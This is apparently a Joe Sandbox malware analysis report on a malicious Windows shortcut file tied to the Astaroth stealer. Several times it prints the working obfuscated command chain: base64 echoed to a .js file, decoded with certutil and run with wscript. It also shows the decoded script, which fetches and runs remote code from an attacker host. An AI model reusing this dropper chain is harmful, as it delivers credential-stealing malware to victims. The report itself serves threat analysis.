Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pyo37mDzQ2.lnk

Overview

General Information

Sample Name:Pyo37mDzQ2.lnk
Analysis ID:795108
MD5:d52ac7755bd61b035235df79fabe1b59
SHA1:4e7a57f7c7fc8ee15cb390337983d116220c7625
SHA256:f3c3d2fae15f05589f8860df40d0533165484fb2975b2204c2f7cca750eb7b51
Tags:AstarothBRAgeoGuildmalnk
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • cmd.exe (PID: 3232 cmdline: C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • certutil.exe (PID: 5148 cmdline: cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS MD5: EB199893441CED4BBBCB547FE411CF2D)
    • wscript.exe (PID: 5188 cmdline: "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.6104.21.40.8349711802851288 01/31/23-12:59:14.367073
SID:2851288
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.40.83 80
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeDomain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.123.96 443
Source: TrafficSnort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.6:49711 -> 104.21.40.83:80
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 104.16.123.96 104.16.123.96
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Jan 2023 11:59:15 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=8.000002708286e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnlyServer: cloudflareCF-RAY: 792247b819f291f3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTtP://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000003.253408697.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248160964.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254191636.00000210607A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://niua9f.tabcoperoo.sbs/
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comp
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/M
Source: wscript.exe, 00000003.00000003.253581606.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorP%
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/U
Source: unknownDNS traffic detected: queries for: niua9f.tabcoperoo.sbs
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: C:\Windows\System32\certutil.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: classification engineClassification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
Source: wscript.exe, 00000003.00000003.253581606.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.000002106078D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.40.83 80
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeDomain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.123.96 443
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\9cea9ja\>nul 2>&1 &&s^et seeh=c:\9cea9ja\^9cea9ja.^js&&echo dmfyienms3i9innjiisicii7rgzlcj0iaxaikyj0omgio0vms3i9ilqikyj0ucirijoio0dlde9iamvjdchdzktyk0rms3irrwzlcisily9uaxvhowyudgfiy29wzxjvby5zynmvpzeviik7>!seeh!&&certutil -f -deco^de !seeh! !seeh!&&ca^ll !seeh!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
Path Interception111
Process Injection
111
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer3
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
hTtP://niua9f.tabcoperoo.sbs/?1/0%Avira URL Cloudsafe
http://niua9f.tabcoperoo.sbs/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.cloudflare.com
104.16.123.96
truefalse
    high
    niua9f.tabcoperoo.sbs
    104.21.40.83
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://niua9f.tabcoperoo.sbs/?1/true
        unknown
        https://www.cloudflare.com/cdn-cgi/errorfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          hTtP://niua9f.tabcoperoo.sbs/?1/wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://niua9f.tabcoperoo.sbs/wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.cloudflare.com/cdn-cgi/errorP%wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://www.cloudflare.com/wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://www.cloudflare.com/cdn-cgi/errore.com/Uwscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://www.cloudflare.com/Mwscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.40.83
                  niua9f.tabcoperoo.sbsUnited States
                  13335CLOUDFLARENETUStrue
                  104.16.123.96
                  www.cloudflare.comUnited States
                  13335CLOUDFLARENETUSfalse
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:795108
                  Start date and time:2023-01-31 12:58:15 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 3m 10s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:4
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:Pyo37mDzQ2.lnk
                  Detection:MAL
                  Classification:mal68.evad.winLNK@6/1@2/2
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .lnk
                  • Stop behavior analysis, all processes terminated
                  • Exclude process from analysis (whitelisted): conhost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):108
                  Entropy (8bit):4.697147484425549
                  Encrypted:false
                  SSDEEP:3:qyuX+oOhDuXYHMWde5IYx1iHeYYGRZPyXXLcfvBRHfn:qyfv+3WdeRzke5IPynL0vnHf
                  MD5:3D8FB0FB90641271F11C02795AEAEFA1
                  SHA1:D2248D3C840633191E56D225136FD43F6237245B
                  SHA-256:F0CB27B5D3E72DD6BCF9CA34F67FBDABC89BA5494CA923498D2207866FE6634B
                  SHA-512:E4F47672E29942BF631B17946C8BDF5991BD46F8B3B98D9B6D7693B9FD9F44BB80A9420E33BB122D597AD09CB00911B13E97476126FF0FE3BCA86E716E81977F
                  Malicious:false
                  Reputation:low
                  Preview:var CfKr="sc"+"r";DfKr="ip"+"t:h";EfKr="T"+"tP"+":";GetObject(CfKr+DfKr+EfKr+"//niua9f.tabcoperoo.sbs/?1/");
                  File type:MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                  Entropy (8bit):5.401600363387979
                  TrID:
                  • Windows Shortcut (20020/1) 100.00%
                  File name:Pyo37mDzQ2.lnk
                  File size:481
                  MD5:d52ac7755bd61b035235df79fabe1b59
                  SHA1:4e7a57f7c7fc8ee15cb390337983d116220c7625
                  SHA256:f3c3d2fae15f05589f8860df40d0533165484fb2975b2204c2f7cca750eb7b51
                  SHA512:880eaff5bd403739440ce8d1cdb56d4660cd9d72458414e6982806c2c8192508d80c59b9d49dfaf7fed012c8c924e9cde9391894f0cc6e3b7133e60d075dcacf
                  SSDEEP:12:8rflM8OBE6ZGQWgkxe5D5hex1tjdsLKOmesAzm74Uj1cSTj3pqexA:8loGQWFxed5he7taLKOg8m7jj1cuAe2
                  TLSH:B8F0AB9D90402D70E8296CB7CA820F106B5DFE830B002022039E029A8170A889E1E268
                  File Content Preview:L..................F1... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........wINdOws\sYSteM32\conHost.EXe.....C:\wINdOws\sYSteM32..%ComSpec% /V/D/c "md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA
                  Icon Hash:00828e868e89bd0d

                  General

                  Relative Path:
                  Command Line Argument:%ComSpec% /V/D/c "md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!"
                  Icon location:
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.6104.21.40.8349711802851288 01/31/23-12:59:14.367073TCP2851288ETPRO TROJAN Astaroth Stealer Activity (GET)4971180192.168.2.6104.21.40.83
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 31, 2023 12:59:14.349073887 CET4971180192.168.2.6104.21.40.83
                  Jan 31, 2023 12:59:14.366229057 CET8049711104.21.40.83192.168.2.6
                  Jan 31, 2023 12:59:14.366476059 CET4971180192.168.2.6104.21.40.83
                  Jan 31, 2023 12:59:14.367073059 CET4971180192.168.2.6104.21.40.83
                  Jan 31, 2023 12:59:14.384046078 CET8049711104.21.40.83192.168.2.6
                  Jan 31, 2023 12:59:14.581177950 CET8049711104.21.40.83192.168.2.6
                  Jan 31, 2023 12:59:14.581281900 CET4971180192.168.2.6104.21.40.83
                  Jan 31, 2023 12:59:14.638326883 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:14.638390064 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:14.638463020 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:14.778786898 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:14.778856993 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:14.828788996 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:14.828986883 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.208287001 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.208333969 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:15.208878040 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:15.209012985 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.212465048 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.212539911 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:15.262185097 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:15.262284040 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:15.262373924 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.262415886 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.281167984 CET49712443192.168.2.6104.16.123.96
                  Jan 31, 2023 12:59:15.281203985 CET44349712104.16.123.96192.168.2.6
                  Jan 31, 2023 12:59:18.240602016 CET4971180192.168.2.6104.21.40.83
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 31, 2023 12:59:14.306969881 CET4944853192.168.2.68.8.8.8
                  Jan 31, 2023 12:59:14.331960917 CET53494488.8.8.8192.168.2.6
                  Jan 31, 2023 12:59:14.596761942 CET5908253192.168.2.68.8.8.8
                  Jan 31, 2023 12:59:14.620973110 CET53590828.8.8.8192.168.2.6
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 31, 2023 12:59:14.306969881 CET192.168.2.68.8.8.80x412bStandard query (0)niua9f.tabcoperoo.sbsA (IP address)IN (0x0001)false
                  Jan 31, 2023 12:59:14.596761942 CET192.168.2.68.8.8.80xef78Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 31, 2023 12:59:14.331960917 CET8.8.8.8192.168.2.60x412bNo error (0)niua9f.tabcoperoo.sbs104.21.40.83A (IP address)IN (0x0001)false
                  Jan 31, 2023 12:59:14.331960917 CET8.8.8.8192.168.2.60x412bNo error (0)niua9f.tabcoperoo.sbs172.67.182.146A (IP address)IN (0x0001)false
                  Jan 31, 2023 12:59:14.620973110 CET8.8.8.8192.168.2.60xef78No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                  Jan 31, 2023 12:59:14.620973110 CET8.8.8.8192.168.2.60xef78No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                  • www.cloudflare.com
                  • niua9f.tabcoperoo.sbs

                  Click to jump to process

                  Target ID:1
                  Start time:12:59:11
                  Start date:31/01/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
                  Imagebase:0x7ff7cb270000
                  File size:273920 bytes
                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:12:59:11
                  Start date:31/01/2023
                  Path:C:\Windows\System32\certutil.exe
                  Wow64 process (32bit):false
                  Commandline:cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
                  Imagebase:0x7ff638c70000
                  File size:1557504 bytes
                  MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:3
                  Start time:12:59:12
                  Start date:31/01/2023
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
                  Imagebase:0x7ff64c9e0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly